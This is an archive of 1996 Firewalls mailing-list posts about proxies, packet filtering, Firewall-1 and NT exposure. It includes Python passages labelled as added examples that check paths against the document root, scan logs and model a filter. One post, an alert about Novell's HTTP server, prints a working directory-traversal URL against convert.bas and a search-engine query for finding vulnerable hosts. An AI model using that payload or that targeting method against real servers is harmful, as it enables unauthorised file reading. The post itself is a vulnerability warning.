In fairness to Microsoft, it may be pretty good stuff. But we can't tell from what they say. Which is why I feel it marks a milestone in the firewall market. The Big Boys Are Here now and it's SECURE, it's OK. That argument worked for Netscape, for a while.

Those of us who've been with this firewall thing for a while have seen the market get muddied before, and eventually things calm down again. It'll be fascinating to see what happens if Microsoft decides to put even a teeny bit of their marketing muscle behind Catapult. I guess it means that, as a technology, firewalls have "arrived."

mjr.
From firewalls-owner Wed Jul 3 14:54:05 1996
From: Michael Ryan
Reply-To: mike@networx.ie
Organization: I.T. NetworX Ltd, 67 Merrion Square, Dublin 2, Ireland
Date: Wed, 3 Jul 1996 22:36:58 BST
To: Firewalls
Subject: tcpshow man page

The manpage for tcpshow is now at http://www.cs.berkeley.edu/~daw/mike

Regards,
Mike
---

From firewalls-owner Wed Jul 3 15:04:48 1996
From: Colin Campbell
Subject: Re: NEC SocksPlus??
To: Russ.Cooper@RC.Toronto.on.ca (Russ)
Date: Thu, 4 Jul 1996 07:55:52 +1000 (EST)
Cc: firewalls@GreatCircle.COM

My mailer thinks Russ said:
> [lots of stuff about SOCKS(Plus)]
>

The thing that stopped me using socks and going for fwtk was the requirement to find/manufacture socks-compatible clients. In my admittedly limited knowledge of that side of the market, only Netscape is SOCKS-aware. What do you do when you have to support users on systems from 100 different vendors running 30 different operating systems and Win 3.X (not considered an OS :-) all with their favourite tools for ftp/telnet/....

Colin

From firewalls-owner Wed Jul 3 15:23:21 1996
From: TTT Group
Date: Wed, 3 Jul 1996 14:50:06 -0700 (PDT)
To: firewalls@greatcircle.com
Subject: *** SECURITY ALERT ***

I spent some time exploring Novell's HTTP server and out of the box there is a CGI that is VERY VERY INSECURE!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
If you are running the Novell HTTP server, please disable the CGI's it comes with until you understand (fully understand) what the security risks are.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

The CGI in question is convert.bas (yes, cgi's in basic, stop laughing). (There may be more CGI's in the scripts dir that can be exploited but this was all I could stomach.)

A remote user can read any file on the remote file system using this CGI. This means that if you are running the Novell HTTP server and have the 'out of box' CGI's, you are breached.

Exploit code:

http://victim.com/scripts/convert.bas?../../anything/you/want/to/view

I was going to see how bad this threat was by connecting to www servers, testing for "Novell HTTP" in the HTTP server response BUT WHY DO THAT WHEN YOU HAVE www.altavista.digital.com :-)

+links:scripts/convert.bas

will return you all the sites that can be breached.

PLEASE PLEASE PLEASE don't open the box and put the machine on the Internet. I am getting tired of this kind of stuff. Who the hell did Novell consult with to write these darn CGI's? It makes me sad.
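The defender's side of the report above, as an added example (not Novell's code and not part of the original post): the docroot-confinement check a file-serving CGI such as convert.bas should perform before opening anything, and a scan of ordinary access-log lines for requests whose argument escapes the document root. DOCROOT, the Common Log Format layout and every log line are constructed; the page says nothing about Novell's actual file layout.

```python
"""Docroot confinement for a file-serving CGI, plus a log scan for requests
that escape it.  Added example; DOCROOT and SAMPLE_LOG are constructed."""
import posixpath
import re
from urllib.parse import unquote, urlsplit

DOCROOT = "/web/docroot"   # constructed placeholder for the server's document root

# Common Log Format: host ident user [time] "method target version" status size
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log.  Lines 2 and 3 carry the traversal pattern from the
# report, the third one URL-encoded so a naive substring match would miss it.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Jul/1996:14:50:07 -0700] "GET /scripts/convert.bas?docs/index.htm HTTP/1.0" 200 1024
198.51.100.7 - - [03/Jul/1996:14:52:11 -0700] "GET /scripts/convert.bas?../../anything/you/want/to/view HTTP/1.0" 200 4096
198.51.100.7 - - [03/Jul/1996:14:52:30 -0700] "GET /scripts/convert.bas?..%2F..%2Fprivate%2Fdata.txt HTTP/1.0" 200 512
203.0.113.5 - - [03/Jul/1996:14:53:02 -0700] "GET /index.htm HTTP/1.0" 200 2048
"""


def resolve_within_docroot(requested, docroot=DOCROOT):
    """Canonical path for a client-supplied name, or None if it leaves docroot.

    Decode first, normalise second, compare last: looking for ".." in the raw
    string misses encoded or backslash forms, and a prefix test on the
    unnormalised path would accept "docroot/../../x".
    """
    decoded = unquote(requested)
    if "\x00" in decoded:                  # NUL would truncate the name in a C runtime
        return None
    decoded = decoded.replace("\\", "/")   # treat DOS-style separators like "/"
    candidate = posixpath.normpath(posixpath.join(docroot, decoded.lstrip("/")))
    if candidate == docroot or candidate.startswith(docroot + "/"):
        return candidate
    return None


def find_traversal_requests(log_text, docroot=DOCROOT):
    """(host, status, decoded argument) for convert.bas requests that escape docroot.

    A 200 status on one of these means the server actually served the file.
    """
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/scripts/convert.bas"):
            continue
        if resolve_within_docroot(url.query, docroot) is None:
            hits.append((m["host"], int(m["status"]), unquote(url.query)))
    return hits


if __name__ == "__main__":
    for host, status, arg in find_traversal_requests(SAMPLE_LOG):
        print(f"{host} status={status} argument={arg!r}")
```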
--blast

From firewalls-owner Wed Jul 3 15:34:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA04707 for firewalls-outgoing; Wed, 3 Jul 1996 15:18:26 -0700 (PDT) Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA04678 for ; Wed, 3 Jul 1996 15:18:16 -0700 (PDT) Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.7.5/8.7.3) id IAA17683; Thu, 4 Jul 1996 08:07:47 +1000 (EST) Received: from guru.citec.qld.gov.au(147.132.20.47) by citecuh.citec.qld.gov.au via smap (V1.3) Received: (from sgcccdc@localhost) by guru.citec.qld.gov.au (8.6.12/8.6.12) id IAA05993; Thu, 4 Jul 1996 08:15:43 +1000 From: Colin Campbell Message-Id: <199607032215.IAA05993@guru.citec.qld.gov.au> Subject: Re: Integrating Reuters Service thru TIS Toolkit To: zwobada@apogee-com.fr (Jean-Francois Zwobada) Date: Thu, 4 Jul 1996 08:15:43 +1000 (EST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <31DAAD64.1702@apogee-com.fr> from "Jean-Francois Zwobada" at Jul 3, 96 07:27:00 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

My mailer thinks Jean-Francois Zwobada said:
> [lots of stuff]
>
> and the Gauntlet version can support many-to-many connections such
> as:
> plug-gw: port nntp 1.2.3.* -port nntp
> where you don't specify the real destination to plug to. But I don't
> know if the Toolkit can do it.
>

I believe they can only do this by supporting transparent proxies and that requires kernel hacks which is why Gauntlet (on BSDI only?) supports it and the toolkit doesn't. It is in essence nothing more than a router filter, restricting access to certain addresses (1.2.3.*).
Colin

From firewalls-owner Wed Jul 3 15:49:02 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05601 for firewalls-outgoing; Wed, 3 Jul 1996 15:29:11 -0700 (PDT) Received: from pdh.com (pdh.com [192.159.13.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA05558 for ; Wed, 3 Jul 1996 15:28:59 -0700 (PDT) Received: from telluride.pdh.com by pdh.com (NeXT-1.0 (From Sendmail 5.52)/NeXT-2.0) Message-Id: <9607032224.AA09477@pdh.com> Received: by telluride.pdh.com (NX5.67f2/NX3.0X) Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 3.3 v118.2) Received: by NeXT.Mailer (1.118.2) From: Jason Rhoads Date: Wed, 3 Jul 96 15:25:36 -0700 To: firewalls@greatcircle.com Subject: Re:OS/2 firewalls? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Sorry I don't know of any OS/2 firewalls, but I do have some experience with FreeBSD. The TIS Firewall Toolkit and Darren Reed's IP Filter package both work great under FreeBSD. However, you will need some UNIX expertise in order to get things up and running. They are not plug and play solutions.

TIS Toolkit (ftp://ftp.tis.com/pub/firewalls/toolkit)
IP Filter (http://www.cyber.com.au/users/darrenr)
FreeBSD (http://www.freebsd.org)

- Jason

Begin forwarded message:

X-Authentication-Warning: lapsene.mii.lu.lv: uulda set sender to lda!lda.gov.lv!uldis@lda.gov.lv using -f >Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); To: firewalls@greatcircle.com From: Uldis Bojars Subject: OS/2 firewalls? Date: Wed, 3 Jul 1996 10:21:52 +0200 Lines: 17 Sender: firewalls-owner@greatcircle.com

Hi! I am searching for OS/2 firewalls - are there any? It's very hard to find, but I think there are some. Of course I do not want OS/2 because I want to use firewall as a workstation ;-)

And - if negative - what are good firewalls for freeBSD? Our company is not so big to buy Sun or HP UNiX computer and use it as a firewall.

Uldis

> If you learn from mistakes, you will learn a lot today.
--- GoldED/386 3.00.Alpha1+

From firewalls-owner Wed Jul 3 17:19:12 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA14429 for firewalls-outgoing; Wed, 3 Jul 1996 17:13:32 -0700 (PDT) Received: from ns.isk.co.kr ([203.240.169.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA14417 for ; Wed, 3 Jul 1996 17:13:23 -0700 (PDT) Received: from isk82.isk.co.kr (isk82.isk.co.kr [203.240.169.82]) by ns.isk.co.kr (8.6.12H1/8.6.12) with SMTP id JAA02310 for ; Thu, 4 Jul 1996 09:10:37 +0900 Message-ID: <31DB0BEF.7D57@isk.co.kr> Date: Thu, 04 Jul 1996 09:10:23 +0900 From: "Kwanho Shin(=?EUC-KR?B?vcWw/Mij?=)" Organization: Internet Security Korea X-Mailer: Mozilla 3.0b4 (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: IP translation Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

When I set up Firewall-1 (Checkpoint), I met some problems. First is how I can set up IP translation (inbound & outbound). I set route, arp for illegal IP & global IP. But I can translate IP address (Illegal --> Global, Global --> Illegal)

--
Kwanho Shin (HL1MLV) Mailto: skh@isk.co.kr Internet Security Korea Co., Ltd.
Tel:(02)786-3555 Fax:(02)786-3554

From firewalls-owner Wed Jul 3 17:34:01 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA14430 for firewalls-outgoing; Wed, 3 Jul 1996 17:13:33 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA14414 for ; Wed, 3 Jul 1996 17:13:21 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB691B.1D403040@rwcooper.rc.toronto.on.ca> From: Russ To: "'Firewalls@GreatCircle.COM'" Subject: RE: Catapault firewall Date: Wed, 3 Jul 1996 20:06:24 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

[rant]
Art's message about networkMCI WebMaker was the first time I'd heard of the product. See, I work for MCI, actually, SHL who is owned by MCI. Actually, I am the National Coordinator for the regional Internet/Intranet Professional Services groups here in Canada (at least that's the title they've given me). Unfortunately, my position doesn't mean squat to corporate MCI. Third party Firewall developers have asked me for my opinion on their products, but the company I work for doesn't know I exist (presumably). For Christ's sake, the damn thing even uses NT at its core...;-[...like I might know a thing or two about NT...;-[ ...Anyone wonder why I'm looking for new digs??? (p.s. has to be in Canada)
[/rant]

For a more detailed product description of networkMCI WebMaker, have a look at;

http://www.webmaker.mci.com/webmaker/features/secbrf.htm

which has some technical information about the security design of the WebMaker product. It isn't simply NT running on a Pentium Pro. The box includes a "Router on an ISA card", which is a packet-filtering router which only allows packets through on tcp 80/443/25, tcp 21 (outbound only), and port 1023 for established client connections. It also allows udp 53 for DNS.
With these ports only, it's impossible to get to NT's server components like RPC or NetBIOS from the Internet, so issues like remotely accessing its registry or logging into the server are pretty much out of the question. Access to the box from the LAN is restricted by the Intel Proxy Server which supposedly only understands HTTP. Depending on how that's been implemented, it may still be possible to access the NT Workstation's registry from the LAN.

This "Router on a card" has its own Ethernet port, and uses a management application that speaks directly to it, not to NT. IP Forwarding is turned off in NT, and two additional ethernet adapters are in the box. One connects to the ethernet port on the "Router on a card" using a cross-over cable to establish connectivity to the Internet, the other connects to the Internal network.

The Proxy Server is from Intel??, and they say it will only allow outbound HTTP requests (which sorta contradicts the statement about FTP being allowed for outbound only??). It proxies the requests and therefore does not use the internal IP addresses.

All the marketing tripe to one side, this is a nice piece of hardware. So while the software being used would need to be evaluated to determine if it's safe or not, the concept is pretty sound and the implementation seems to adhere to the design principle.

[megarant]
Either way, it's another example of how my parent company wants to put me out of a job, embarrass me in public, and in general, ignore their hired guns in lieu of *unknown* (to me). Maybe they figured that since the WebMaker will only be available in the U.S. they didn't need the opinion of a Canadian. Obviously nobody from MCI (other than me) reads this list.
Do I sound bitter?...naw...;-]
[/megarant]

Cheers, Russ

From firewalls-owner Wed Jul 3 18:04:01 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA15788 for firewalls-outgoing; Wed, 3 Jul 1996 17:43:02 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA15768 for ; Wed, 3 Jul 1996 17:42:53 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB691F.3F836920@rwcooper.rc.toronto.on.ca> From: Russ To: "Firewalls@GreatCircle.COM" Subject: RE: udp 137 broadcast from Win95 PC Date: Wed, 3 Jul 1996 20:35:58 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

The UDP 137 packets from your Win95 machine are the machine announcing itself to the network in an attempt to determine who is the NetBIOS Browse Master for that network. In the event it cannot find one, it will become the Browse Master itself. I would suspect that your packets came about simultaneous to reboots or power-ups, which you could confirm by monitoring a power-up sequence and seeing how many packets it generates.

You can turn off this capability, thereby forcing it not to attempt to become a Browse Master by going to Control Panel, Networks, File and Printer Sharing for Microsoft Networks, Properties, Browse Master = No.

Make sure you have applied Service Pack #1 for Windows 95 to an Internet exposed Windows 95 machine that has File and Print Sharing enabled.
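An added example (not MCI's or Intel's code, and not part of either message) that encodes the WebMaker "router on a card" rules as Russ describes them and checks sample packets against them, including the NT RPC/NetBIOS ports and the udp 137 NetBIOS name-service traffic from the Win95 browse-master discussion. Two readings are my assumptions: "port 1023 for established client connections" is taken as the classic stateless rule "TCP destination port above 1023 with ACK set", and "udp 53 for DNS" as outbound queries to port 53 plus replies from port 53 to unprivileged client ports.

```python
"""Stateless packet-filter policy for the WebMaker router, as read from Russ's
message, with sample packets.  Added example; the rule reading is an assumption."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    proto: str      # "tcp" or "udp"
    inbound: bool   # True: Internet -> WebMaker; False: WebMaker -> Internet
    sport: int
    dport: int
    ack: bool = False   # TCP ACK flag; a SYN without ACK opens a new connection


SERVICE_PORTS = {80, 443, 25}   # tcp 80/443/25, either direction


def router_allows(p: Packet) -> bool:
    """True if the packet passes the filter described in the message."""
    if p.proto == "tcp":
        if p.dport in SERVICE_PORTS:
            return True
        if p.dport == 21 and not p.inbound:     # FTP control channel, outbound only
            return True
        if p.dport > 1023 and p.ack:            # replies into established client sessions
            return True
        return False
    if p.proto == "udp":
        if p.dport == 53 and not p.inbound:     # DNS query from the box (assumption)
            return True
        if p.sport == 53 and p.dport > 1023:    # DNS reply to an unprivileged port (assumption)
            return True
        return False
    return False


# NT services whose reachability the message argues about.
NT_SERVICE_PORTS = {
    "rpc-endpoint-mapper": ("tcp", 135),
    "netbios-ns": ("udp", 137),     # the browse-master announcements discussed above
    "netbios-dgm": ("udp", 138),
    "netbios-ssn": ("tcp", 139),
}


def exposed_nt_services() -> list:
    """NT services to which an Internet host could open a *new* session."""
    return [
        name for name, (proto, port) in NT_SERVICE_PORTS.items()
        if router_allows(Packet(proto, True, 40000, port))
    ]


if __name__ == "__main__":
    samples = [
        Packet("tcp", True, 40000, 80),             # inbound HTTP: allowed
        Packet("tcp", True, 40000, 139),            # inbound NetBIOS session: dropped
        Packet("tcp", True, 80, 40000, ack=True),   # HTTP reply to the proxy: allowed
        Packet("tcp", True, 40000, 40000),          # new inbound SYN to a high port: dropped
        Packet("udp", True, 40000, 137),            # inbound NetBIOS name service: dropped
        Packet("tcp", False, 40000, 21),            # outbound FTP control: allowed
    ]
    for s in samples:
        print(f"{'ALLOW' if router_allows(s) else 'DROP':5} {s}")
    print("exposed NT services:", exposed_nt_services())
```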
Cheers, Russ

From firewalls-owner Wed Jul 3 19:07:38 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA22965 for firewalls-outgoing; Wed, 3 Jul 1996 19:00:49 -0700 (PDT) Received: from ns.isk.co.kr ([203.240.169.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA22947 for ; Wed, 3 Jul 1996 19:00:38 -0700 (PDT) Received: from isk82.isk.co.kr (isk82.isk.co.kr [203.240.169.82]) by ns.isk.co.kr (8.6.12H1/8.6.12) with SMTP id KAA03666 for ; Thu, 4 Jul 1996 10:57:55 +0900 Message-ID: <31DB2515.3A83@isk.co.kr> Date: Thu, 04 Jul 1996 10:57:41 +0900 From: "Kwanho Shin(=?EUC-KR?B?vcWw/Mij?=)" Organization: Internet Security Korea X-Mailer: Mozilla 3.0b4 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: IP address translation Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

When I set up Firewall-1 (Checkpoint), I met some problems. First is how I can set up IP translation (inbound & outbound). I set route, arp for illegal IP & global IP. But I can translate IP address (Illegal --> Global, Global --> Illegal)

If you've been set above it, to send information, please. Have a nice Day!!

--
Kwanho Shin (HL1MLV) Mailto: skh@isk.co.kr Internet Security Korea Co., Ltd.
Tel:(02)786-3555 Fax:(02)786-3554

From firewalls-owner Wed Jul 3 19:21:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA23110 for firewalls-outgoing; Wed, 3 Jul 1996 19:04:42 -0700 (PDT) Received: from pdx1 (pdx1.world.net [192.243.32.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA23098 for ; Wed, 3 Jul 1996 19:04:34 -0700 (PDT) Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1 (8.6.9/8.6.9) with ESMTP id TAA08601 for ; Wed, 3 Jul 1996 19:03:07 -0700 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id MAA14738 for firewalls@greatcircle.com; Thu, 4 Jul 1996 12:01:07 +1000 Received: from applejack.CS.YALE.EDU (APPLEJACK.CS.YALE.EDU [128.36.0.131]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id EAA28051 for ; Thu, 4 Jul 1996 04:11:41 +1000 Received: from eli.CS.YALE.EDU by applejack.CS.YALE.EDU (8.7.1/res.host.cf-4.0) Received: by eli.CS.YALE.EDU id KAA16403; Wed, 3 Jul 1996 10:32:33 -0400 (EDT) sender owner-sneakers@CS.YALE.EDU for sneakers-outgoing Received: from bulldog.CS.YALE.EDU by eli.CS.YALE.EDU (8.7.1/res.host.bitnet.cf-4.1) Received: from relay1.smtp.psi.net by bulldog.CS.YALE.EDU (8.7.1/res.host.uucp.cf-4.1) Received: from uu6.psi.com by relay1.smtp.psi.net (8.6.12/SMI-5.4-PSI) Received: from larry.dcbnet.com by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; Received: from jmccain.dcbnet.com (mccain [205.166.54.68]) by larry.dcbnet.com (8.6.12/8.6.12) with SMTP id JAA18448 for ; Wed, 3 Jul 1996 09:30:54 -0500 Message-Id: <199607031430.JAA18448@larry.dcbnet.com> X-Sender: jmccain@dcbnet.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jul 1996 09:37:05 -0500 To: sneakers@CS.YALE.EDU From: jmccain@dcbnet.com (John McCain) Subject: Iphone vulnerabilities Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

One of my clients came up with this today.
Anyone else run into Iphone security problems?

The situation. He's connected ppp to an ISP on a dial-up line. His comments...

Today I was connected to the net, and my i-phone rang. Someone said they were testing their i-net phone. I told them they sounded ok, and they said "just a minute". Seconds later I noticed my i-phone software was flashing something. (Don't remember the initials now but it was three letters toward the bottom left of the screen.) Not knowing, I disconnected. Later I ran netscape and found my bookmark.htm file has been drastically changed. I wonder if they were trying to download some files in hope of getting financial stuff, etc. (I don't have on laptop). Anyway, I don't think I care for I-phone now

Regards, John

From firewalls-owner Wed Jul 3 19:38:29 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA24984 for firewalls-outgoing; Wed, 3 Jul 1996 19:33:19 -0700 (PDT) Received: from gatekeeper.qualix.com (gatekeeper.qualix.com [192.91.182.105]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA24977 for ; Wed, 3 Jul 1996 19:33:12 -0700 (PDT) Received: from qualix.qualix by gatekeeper.qualix.com (8.6.9/Q940531.1) Received: from qualix20.qualix by qualix.qualix (4.1/SMI-4.1-Q931113.1) Received: from spirit.qualix by qualix20.qualix (SMI-8.6/SMI-SVR4) Received: by spirit.qualix (5.x/SMI-SVR4) From: security@qualix.com (Nik I. Knoth) Message-Id: <9607040226.AA17040@spirit.qualix> Subject: Re: Hardware requirements of Firewall-1 To: baysalc@boun.edu.tr (Can BAYSAL) Date: Wed, 3 Jul 1996 19:26:55 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Can BAYSAL" at Jun 30, 96 03:08:07 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

It does, in fact, work on an IPX. I have a customer who is protecting his internal net with FW-1 on a sparc IPX...
To answer yours, yes a sparc 5 would prob be quite sufficient. CP's FW-1 is not terribly resource-intensive.

-nik
--
/\/ik I. /

> Hi there;
> I wonder what is the REAL minimum required configuration of
> Firewall-1. The book says that Sun SPARC based system, I do not think
> this means IPX :) , does it? For example on a 10 Mbits ethernet would a
> Sparc 5 be acceptable?
>
> Thanks;
> Can Baysal
>

From firewalls-owner Wed Jul 3 20:05:42 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA27725 for firewalls-outgoing; Wed, 3 Jul 1996 19:50:42 -0700 (PDT) Received: from news.tcd.net (news.tcd.net [198.70.50.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA27696 for ; Wed, 3 Jul 1996 19:50:33 -0700 (PDT) Received: from main.tcd.net (root@main.tcd.net [198.70.50.4]) by news.tcd.net (8.6.12/8.6.9) with ESMTP id UAA07630 for ; Wed, 3 Jul 1996 20:47:54 -0600 Received: from LOCALNAME (slip13.slc.tcd.net [204.248.105.93]) by main.tcd.net (8.7.5/8.7.5) with SMTP id UAA05591 for ; Wed, 3 Jul 1996 20:47:52 -0600 Date: Wed, 3 Jul 1996 20:47:52 -0600 Message-Id: <199607040247.UAA05591@main.tcd.net> X-Sender: pate19@mail.tcd.net X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: PatrickEyler Subject: RE: Training??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 11:33 AM 7/3/96 MDT, you wrote:
>Learning Tree was mentioned as a possible place for training. I found
>their web site: http://www.learningtree.com
>
>Gives details on everything from classes offered to when they take place
>and tuition rates.
>
>Scott
>
>
>

You might also look at http://www.arg.com

-pat

From firewalls-owner Wed Jul 3 22:49:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA08886 for firewalls-outgoing; Wed, 3 Jul 1996 22:38:54 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id WAA08879 for ; Wed, 3 Jul 1996 22:38:48 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607040536.AA09660@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: "Kwanho Shin(=?EUC-KR?B?vcWw/Mij?=)" Cc: Firewalls From: Ryan.Russell/SYBASE Date: 3 Jul 96 22:37:16 EDT Subject: Re: IP translation X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

You configure the translation via the fwxlconf program. I think the address translation was introduced in version 2. What specific trouble are you having?

Ryan

---------- Previous Message ----------
To: Firewalls cc: From: skh @ isk.co.kr ("Kwanho Shin(=?EUC-KR?B?vcWw/Mij?=)") @ smtp Date: 07/04/96 09:10:23 AM Subject: IP translation

When I set up Firewall-1 (Checkpoint), I met some problems. First is how I can set up IP translation (inbound & outbound). I set route, arp for illegal IP & global IP. But I can translate IP address (Illegal --> Global, Global --> Illegal)

--
Kwanho Shin (HL1MLV) Mailto: skh@isk.co.kr Internet Security Korea Co., Ltd.
Tel:(02)786-3555 Fax:(02)786-3554

From firewalls-owner Wed Jul 3 23:22:11 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA10452 for firewalls-outgoing; Wed, 3 Jul 1996 23:11:54 -0700 (PDT) Received: from firewall.ddeorg.soft.net (firewall.ddeorg.soft.net [164.164.74.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA10425 for ; Wed, 3 Jul 1996 23:11:25 -0700 (PDT) Received: by firewall.ddeorg.soft.net (5.61/9.3) Received: from orion.ddeorg.soft.net by ddeorg.soft.net (5.61/9.3) with SMTP Received: by orion.ddeorg.soft.net (4.1/9.7) Message-Id: <9607040608.AA08800@orion.ddeorg.soft.net> X-Mailer: exmh version 1.6.6 3/24/96 To: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 04 Jul 1996 06:08:08 +0000 From: "Rajesh K. R." Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

How can I configure router to allow some packets to transmit and vice versa?

From firewalls-owner Thu Jul 4 00:04:02 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA13104 for firewalls-outgoing; Wed, 3 Jul 1996 23:57:06 -0700 (PDT) Received: from gemsgw.med.ge.com (gemsgw.med.ge.com [192.88.230.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA13097 for ; Wed, 3 Jul 1996 23:57:00 -0700 (PDT) Received: from gemed.med.ge.com (gemed.med.ge.com [3.7.12.4]) by gemsgw.med.ge.com (8.6.12/8.6.12) with ESMTP id BAA00978; Thu, 4 Jul 1996 01:52:02 -0500 Received: from (meru [3.70.200.55]) by gemed.med.ge.com (8.6.12/8.6.12) with SMTP id BAA10280; Thu, 4 Jul 1996 01:54:22 -0500 From: Sameer - The Terminator Message-Id: <199607040654.BAA10280@gemed.med.ge.com> Received: by meru Subject: Re: your mail To: krr@ddeorg.soft.net (Rajesh K. R.) Date: Thu, 4 Jul 96 12:27:13 IST Cc: firewalls@greatcircle.com In-Reply-To: <9607040608.AA08800@orion.ddeorg.soft.net>; from "Rajesh K. R."
at Jul 04, 96 6:08 am Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,
even I am looking for that. Could someone help.
Also, I would like to know how to see the logs on router.
I am having a cisco router.
...sam

>
> How can I configure router to allow some packets to transmit and vice
> versa?
>

From firewalls-owner Thu Jul 4 02:49:18 1996
